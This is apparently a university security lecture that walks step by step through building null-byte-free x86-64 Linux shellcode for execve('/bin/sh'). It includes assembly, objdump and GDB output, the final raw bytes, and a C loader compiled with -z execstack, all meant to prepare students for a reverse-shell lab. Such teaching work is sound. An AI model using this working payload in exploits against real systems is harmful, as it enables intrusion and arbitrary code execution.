Warning

The code in this lecture must be tested on a native Ubuntu machine or in a VM. It does not work in WSL.

Shellcode: Executing "/bin/sh" Program

A shellcode is code that launches a shell. In the lab, we will create code for setting up a reverse shell. Naturally, the adversary would like to inject this shellcode and have the target process run it; the adversary then gains a shell.

In this lecture, as preparation for the lab, we will see how to create code that launches a local shell. To start, consider the following C code, runthis.c. In the end, we want to create raw executable bytes that perform a similar task.


#include <unistd.h>
int main( ) 
{
    char* file = "/bin/sh";

    char* argv[2];
    argv[0] = file;
    argv[1] = 0;

    char** env = 0;

    execve(file, argv, env);
    return 0;
}
Recall that execve executes a program; see its man page (man 2 execve).
$ gcc -g runthis.c -o runthis
$ ./runthis
$ exit 
$ 
Note that you still have a prompt after typing exit. This is because runthis started a new shell (/bin/sh): the exit command closed that inner shell and returned you to the original one.

Shellcode

A shellcode is just the assembly version of the code calling execve("/bin/sh", ...) as above.

Shellcode Requirements

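Since the shellcode is injected as data into a target program, it must satisfy the following requirements in order to work:
  • [REQ1]: It must create the data it needs (here, the string "/bin/sh") by itself, since it cannot rely on data stored elsewhere in the program.
  • [REQ2]: It must not contain a 0x00 byte anywhere; otherwise it is not injectable.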

Satisfying [REQ1]: Encoding the string "/bin/sh" into a number

Creating and storing a string needs some creativity. We can do something like the following:
  • Encode the 8-byte string "/bin/sh\0" (7 characters plus the terminating null byte) into an integer.
See the following Python script (this should make sense to you).

>>> s = b'/bin/sh\0'
>>> n = int.from_bytes(s, 'little')
>>> hex(n)
'0x68732f6e69622f'

Using inline assembly code


// trial1.c
#include <stdio.h>

int main( )
{
  asm("movabsq $0x68732f6e69622f, %rax");
  asm("push %rax");

  printf("a lot more to do...\n");
  return 0;
}
  • [create "/bin/sh"]: movabsq instruction.

    The part movabs means "move an absolute value", and the part q means a quad-word (8 byte number). This instruction puts our magic number into register rax.

  • [store it in memory]: push instruction.

    We push this string (held by rax) onto the stack.

The following GDB log confirms that our code works!
(gdb) l
1       // trial1.c
2       #include <stdio.h>
3
4       int main( )
5       {
6         asm("movabsq $0x68732f6e69622f, %rax");
7         asm("push %rax");
8
9         printf("a lot more to do...\n");
10        return 0;
(gdb) b 6
Breakpoint 1 at 0x63e: file trial1.c, line 6.
(gdb) r
Starting program: /mnt/c/choi0/02teaching/it432/lec/l15/trial1

Breakpoint 1, main () at trial1.c:6
6         asm("movabsq $0x68732f6e69622f, %rax");
(gdb) stepi
7         asm("push %rax");
(gdb) p/x $rax
$1 = 0x68732f6e69622f
(gdb) stepi
9         printf("a lot more to do...\n");
(gdb) hd $rsp 20
0x7ffffffee008: 2F 62 69 6E       / b i n
0x7ffffffee00c: 2F 73 68 00       / s h .
0x7ffffffee010: 60 06 00 08       ` . . .
0x7ffffffee014: 00 00 00 00       . . . .
0x7ffffffee018: F7 1B 02 FF       . . . .
It will be easier to understand the above if you remember that stepi executes the instruction shown right above.
  • The first stepi executes line 6, i.e., movabsq.
  • The second stepi executes line 7, i.e., push.
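
To connect the memory dump to the number we pushed, the following Python sketch reproduces the eight bytes that push %rax writes at the top of the stack. It assumes a little-endian machine (which x86-64 is); the variable names are only for illustration.

```python
import struct

n = 0x68732f6e69622f            # the value held in %rax

# push %rax stores the 8-byte register in little-endian order,
# so the lowest-order byte (0x2f, '/') lands at the lowest address.
stack_bytes = struct.pack("<Q", n)

print(stack_bytes.hex(" "))     # 2f 62 69 6e 2f 73 68 00
print(stack_bytes)              # b'/bin/sh\x00'
```

Read from the lowest address upward, the bytes spell "/bin/sh" followed by the null terminator, which is exactly what a C string looks like in memory.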

Meeting [REQ2]

Now, let's see how these assembly instructions are translated into actual binary bytes. The objdump tool is useful here.
$ objdump -d trial1
...
000000000000063a <main>:
 63a:   55                      push   %rbp
 63b:   48 89 e5                mov    %rsp,%rbp
 63e:   48 b8 2f 62 69 6e 2f    movabs $0x68732f6e69622f,%rax
 645:   73 68 00
 648:   50                      push   %rax 
 649:   48 8d 3d 94 00 00 00    lea    0x94(%rip),%rdi        # 6e4 <_IO_stdin_used+0x4>
 650:   e8 bb fe ff ff          callq  510 <puts@plt>
 655:   b8 00 00 00 00          mov    $0x0,%eax
 65a:   5d                      pop    %rbp
 65b:   c3                      retq
Unfortunately, we have a problem here. The last byte for the movabs instruction is 00. It is not injectable! It turns out that our magic number is 0x0068732f6e69622f with a full 8-byte representation.
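
The problem can also be located mechanically. The sketch below rebuilds the ten bytes of the movabs instruction as they appear in the listing (the two bytes 48 b8 followed by the 8-byte little-endian immediate) and reports where the zero sits. The helper name zero_offsets is made up for this example.

```python
def zero_offsets(code):
    """Return the offsets of all 0x00 bytes in code."""
    return [i for i, byte in enumerate(code) if byte == 0]

n = 0x68732f6e69622f

# 48 b8 is copied from the objdump listing; the 8-byte immediate follows it.
movabs = bytes([0x48, 0xb8]) + n.to_bytes(8, "little")

print(movabs.hex(" "))        # 48 b8 2f 62 69 6e 2f 73 68 00
print(zero_offsets(movabs))   # [9]
```

The single zero is the string's own null terminator, so it cannot simply be dropped; it has to be produced at run time instead.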

Fix: xor two numbers

We fix this problem using xor. That is, we choose two 8-byte numbers a and b (with no 0x00 byte anywhere, to satisfy [REQ2]) such that a xor b equals our magic number n = 0x0068732f6e69622f. As shown in the Python script below, I chose a = 0x11....11 for convenience. Then, we can easily find b, since b = a xor n.

>>> n = 0x68732f6e69622f
>>> a = 0x1111111111111111
>>> b = a ^ n  # a xor n
>>> hex(b)
'0x1179623e7f78733e'
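
As a sanity check, a few lines of Python confirm that the chosen pair really reconstructs the magic number and that neither constant contains a zero byte. The function has_zero_byte is a hypothetical helper written for this check.

```python
def has_zero_byte(value, width=8):
    """True if any of the `width` little-endian bytes of value is 0x00."""
    return 0 in value.to_bytes(width, "little")

n = 0x0068732f6e69622f
a = 0x1111111111111111
b = a ^ n

print(hex(a ^ b))                          # 0x68732f6e69622f
print(has_zero_byte(n))                    # True
print(has_zero_byte(a), has_zero_byte(b))  # False False
```

Any other a would work too, as long as no byte of a is 0x00 and no byte of a equals the byte of n at the same position (that position of b would become 0x00).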

Pushing "/bin/sh" to the stack

Therefore, we can write the code as follows.

asm("movabsq $0x1111111111111111, %rax");
asm("movabsq $0x1179623e7f78733e, %rbx"); 
asm("xor %rbx, %rax");    // %rax ← %rbx xor %rax
asm("push %rax");

Passing Arguments Into the execve() Function

As you can see from the reference, in x86-64, we use the following registers for passing arguments.
  • First argument: rdi
  • Second argument: rsi
  • Third argument: rdx

First argument: set rdi

Recall that the first argument is the address of "/bin/sh". Since we just pushed "/bin/sh" onto the stack, %rsp holds the location of the string. So, we set %rdi ← %rsp.

asm("mov %rsp, %rdi");  // %rdi ← %rsp

Second argument: set rsi

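The second argument is argv. Since it has two entries, we first push two values onto the stack (as the array elements of argv). Because the stack grows toward lower addresses, we push them in reverse order: argv[1] first, then argv[0].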
Note:
  1. The 2nd element argv[1] is 0. So, push 0. You cannot use 0 directly, which would violate [REQ2]. As before, we use the xor trick.
    
    asm("xor %rax, %rax");    // xor trick; %rax ← 0
    asm("push %rax");         // push 0
    
  2. The 1st element argv[0] is the location of "/bin/sh". Luckily, rdi has it! So, we just push the value of rdi on the stack.
    
    asm("push %rdi");     // rdi has the location of "/bin/sh"
    
  3. Now, we can finally set rsi for the second argument argv of execve. Since we just pushed the array contents of argv, the location of argv is again the top of the stack. This means we can just do %rsi ← %rsp.
    
    asm("mov %rsp, %rsi");  // %rsi ← %rsp
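
To picture what the stack looks like at this point, here is a toy Python model of the pushes made so far. The starting address and the dictionary-based memory are assumptions made purely for illustration; real addresses will differ, and the class ToyStack is not part of any library.

```python
class ToyStack:
    """Toy model of the stack: maps an address to the 8-byte value stored there."""

    def __init__(self, rsp):
        self.rsp = rsp
        self.memory = {}

    def push(self, value):
        # push: move %rsp down by 8, then store the value at the new top
        self.rsp -= 8
        self.memory[self.rsp] = value


stack = ToyStack(rsp=0x7ffffffee010)   # made-up starting value of %rsp

stack.push(0x0068732f6e69622f)         # "/bin/sh\0" as a number
rdi = stack.rsp                        # mov %rsp, %rdi : address of the string

stack.push(0)                          # argv[1] = 0
stack.push(rdi)                        # argv[0] = address of "/bin/sh"
rsi = stack.rsp                        # mov %rsp, %rsi : address of argv

print(stack.memory[rsi] == rdi)        # True: argv[0] points at the string
print(stack.memory[rsi + 8])           # 0: argv[1] terminates the array
```

In this model rsi ends up 16 bytes below rdi, with the two array entries sitting in increasing address order, which is the layout execve expects for argv.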
    

Third argument: set rdx

The third argument env can be set to 0. That is, we can set rdx to 0.

asm("xor %rdx, %rdx");  // %rdx ← 0

Calling execve in Assembly

Now, we are ready to call execve, which is in fact a system call. See the syscall table in Linus Torvalds's Linux repository on GitHub.
The index for execve in the syscall table is 59.
A system call is made as follows:
  1. Have rax contain the right index for the system call (i.e., 59 in our case).
    
    asm("mov $59, %rax"); 
    
  2. Run syscall instruction.
    
    asm("syscall");
    

The Overall Code

// trial2.c
#include <stdio.h>

int main( )
{
  // first argument: rdi
  asm("movabsq $0x1111111111111111, %rax");
  asm("movabsq $0x1179623e7f78733e, %rbx"); 
  asm("xor %rbx, %rax");
  asm("push %rax");
  asm("mov %rsp, %rdi");

  // second argument: rsi 
  asm("xor %rax, %rax");
  asm("push %rax");
  asm("push %rdi");
  asm("mov %rsp, %rsi");

  // third argument: rdx
  asm("xor %rdx, %rdx");

  // execve
  asm("mov  $59, %rax");
  asm("syscall");

  return 0;
}
It works like a charm!
$ gcc trial2.c -o trial2
$ ./trial2
$ exit

[REQ2] Check: Oops in the last mov instruction

$ objdump -d trial2
00000000000005fa <main>:
 5fa:   55                      push   %rbp
 5fb:   48 89 e5                mov    %rsp,%rbp
 5fe:   48 b8 11 11 11 11 11    movabs $0x1111111111111111,%rax
 605:   11 11 11
 608:   48 bb 3e 73 78 7f 3e    movabs $0x1179623e7f78733e,%rbx
 60f:   62 79 11
 612:   48 31 d8                xor    %rbx,%rax
 615:   50                      push   %rax
 616:   48 89 e7                mov    %rsp,%rdi
 619:   48 31 c0                xor    %rax,%rax
 61c:   50                      push   %rax
 61d:   57                      push   %rdi
 61e:   48 89 e6                mov    %rsp,%rsi
 621:   48 31 d2                xor    %rdx,%rdx
 624:   48 c7 c0 3b 00 00 00    mov    $0x3b,%rax
 62b:   0f 05                   syscall
 62d:   b8 00 00 00 00          mov    $0x0,%eax
 632:   5d                      pop    %rbp
 633:   c3                      retq
 634:   66 2e 0f 1f 84 00 00    nopw   %cs:0x0(%rax,%rax,1)
 63b:   00 00 00
 63e:   66 90                   xchg   %ax,%ax
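
The offending bytes can be found without reading the listing by eye. The sketch below copies the instruction bytes from the first movabs (address 5fe) through syscall and prints the offset of every 0x00, counted from the first movabs. The variable names are illustrative.

```python
# Instruction bytes copied from the objdump listing of trial2 (5fe through 62c).
body = bytes.fromhex(
    "48 b8 11 11 11 11 11 11 11 11 "   # movabs $0x1111111111111111,%rax
    "48 bb 3e 73 78 7f 3e 62 79 11 "   # movabs $0x1179623e7f78733e,%rbx
    "48 31 d8 "                        # xor    %rbx,%rax
    "50 "                              # push   %rax
    "48 89 e7 "                        # mov    %rsp,%rdi
    "48 31 c0 "                        # xor    %rax,%rax
    "50 "                              # push   %rax
    "57 "                              # push   %rdi
    "48 89 e6 "                        # mov    %rsp,%rsi
    "48 31 d2 "                        # xor    %rdx,%rdx
    "48 c7 c0 3b 00 00 00 "            # mov    $0x3b,%rax
    "0f 05"                            # syscall
)

zeros = [i for i, byte in enumerate(body) if byte == 0]
print(zeros)                           # [42, 43, 44]
print([hex(0x5fe + i) for i in zeros]) # ['0x628', '0x629', '0x62a']
```

All three zeros fall inside the instruction at 624, mov $0x3b,%rax: the constant 59 is encoded as the 4-byte immediate 3b 00 00 00.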

Fix

Fortunately, we can easily fix the problem as follows:

  // %rax contains 0 before this instruction due to xor %rax, %rax
  // Before: asm("mov  $59, %rax");   (its encoding contains 0x00 bytes)

  asm("mov  $59, %al");     // After: writes only the lowest byte of %rax
As shown in the reference, %al is the lowest 8 bits of %rax. Since %rax contains 0 at the moment, setting %al to 59 makes the whole of %rax equal to 59.
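
The effect of writing only %al can be mimicked with bit masks. The function set_al below is a hypothetical model, not real register access: it replaces the lowest 8 bits of a 64-bit value and leaves the other 56 bits alone.

```python
MASK64 = 0xffffffffffffffff

def set_al(rax, value):
    """Model of `mov $value, %al`: overwrite only the lowest 8 bits of rax."""
    return (rax & ~0xff & MASK64) | (value & 0xff)

print(set_al(0, 59))                        # 59
print(hex(set_al(0x1122334455667788, 59)))  # 0x112233445566773b
```

The second call shows why the earlier xor %rax, %rax matters: if the upper bits were not already zero, %rax would not equal 59 after the mov.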

Final Shellcode

Source code: trial2.c.
$ objdump -d trial2
00000000000005fa <main>:
 5fa:   55                      push   %rbp
 5fb:   48 89 e5                mov    %rsp,%rbp
 5fe:   48 b8 11 11 11 11 11    movabs $0x1111111111111111,%rax
 605:   11 11 11
 608:   48 bb 3e 73 78 7f 3e    movabs $0x1179623e7f78733e,%rbx
 60f:   62 79 11
 612:   48 31 d8                xor    %rbx,%rax
 615:   50                      push   %rax
 616:   48 89 e7                mov    %rsp,%rdi
 619:   48 31 c0                xor    %rax,%rax
 61c:   50                      push   %rax
 61d:   57                      push   %rdi
 61e:   48 89 e6                mov    %rsp,%rsi
 621:   48 31 d2                xor    %rdx,%rdx
 624:   b0 3b                   mov    $0x3b,%al
 626:   0f 05                   syscall
 628:   b8 00 00 00 00          mov    $0x0,%eax
 62d:   5d                      pop    %rbp
 62e:   c3                      retq
48 b8 11 11 11 11 11 11 11 11
48 bb 3e 73 78 7f 3e 62 79 11
48 31 d8 
50 
48 89 e7  
48 31 c0
50 
57 
48 89 e6
48 31 d2
b0 3b
0f 05 
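The bytes listed above (everything from the first movabs through syscall, leaving out main's prologue and epilogue) are stored in shtxtcode.txt.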
We can run the following python script to get the binary bytes. You need to understand what's going on here.

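# genshcode.py
# Read the whitespace-separated hex tokens and write them out as raw bytes.
with open("shtxtcode.txt") as fin:
    tokens = fin.read().split()
shellcode = bytes(int(t, 16) for t in tokens)
with open("sc.bin", "wb") as fout:
    fout.write(shellcode)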
The final shellcode is shown below:
$ python3 genshcode.py
$ hexdump -C sc.bin
00000000  48 b8 11 11 11 11 11 11  11 11 48 bb 3e 73 78 7f  |H.........H.>sx.|
00000010  3e 62 79 11 48 31 d8 50  48 89 e7 48 31 c0 50 57  |>by.H1.PH..H1.PW|
00000020  48 89 e6 48 31 d2 b0 3b  0f 05                    |H..H1..;..|
0000002a

Injectable?

Yes!

>>> shcode = open("sc.bin", "rb").read()
>>> injectable(shcode)
True
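
The injectable function is not defined in this section. A minimal stand-in, assuming it only has to check [REQ2] as it is used in this lecture (no 0x00 byte anywhere), could look like the sketch below; the real helper may test more conditions.

```python
def injectable(code):
    """Assumed check: True if code contains no 0x00 byte."""
    return 0 not in code

# The 42 bytes of the final shellcode, copied from the hexdump of sc.bin.
final_code = bytes.fromhex(
    "48b81111111111111111"
    "48bb3e73787f3e627911"
    "4831d8" "50" "4889e7"
    "4831c0" "50" "57" "4889e6"
    "4831d2" "b03b" "0f05"
)

# The mov $0x3b,%rax instruction from the first attempt, for comparison.
old_mov = bytes.fromhex("48c7c03b000000")

print(len(final_code), injectable(final_code))  # 42 True
print(injectable(old_mov))                      # False
```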

Let's Test the ShellCode!


// runthis2.c
#include <stdio.h>

int main()
{
   // read the shellcode into data
   char data[256];
   FILE* fin = fopen("sc.bin", "rb");
   if (fin == NULL) {         // sc.bin must be in the current directory
      perror("sc.bin");
      return 1;
   }
   fread(data, sizeof(char), 256, fin);
   fclose(fin);

   void(*f)();                // Declare a variable f:
                              //  f is a pointer to a function with prototype
                              //  void some_func_name ();

   f = (void(*)()) data;      // The pointer f now points to data (shellcode)

   f();                       // call f:
                              //  since f points to the shellcode,
                              //  the shellcode will be executed as a function!

   return 0;
}

Compile: -z execstack

By default, the stack is marked non-executable, so any attempt to execute code that lives on the stack causes a segmentation fault. To turn off this protection for our test, we add the "-z execstack" option when compiling runthis2.c. This option allows the program to run code that resides on the stack.
$ gcc -z execstack runthis2.c -o runthis2

Run!

$ ./runthis2
$ exit
Tip: Checking the assembly instructions of the injected code.

GDB does not readily show the assembly instructions of injected code, since there is no source line to display. However, it provides a command for this. Whenever you want to see the instruction that is about to be executed, run the following command:

x/i $rip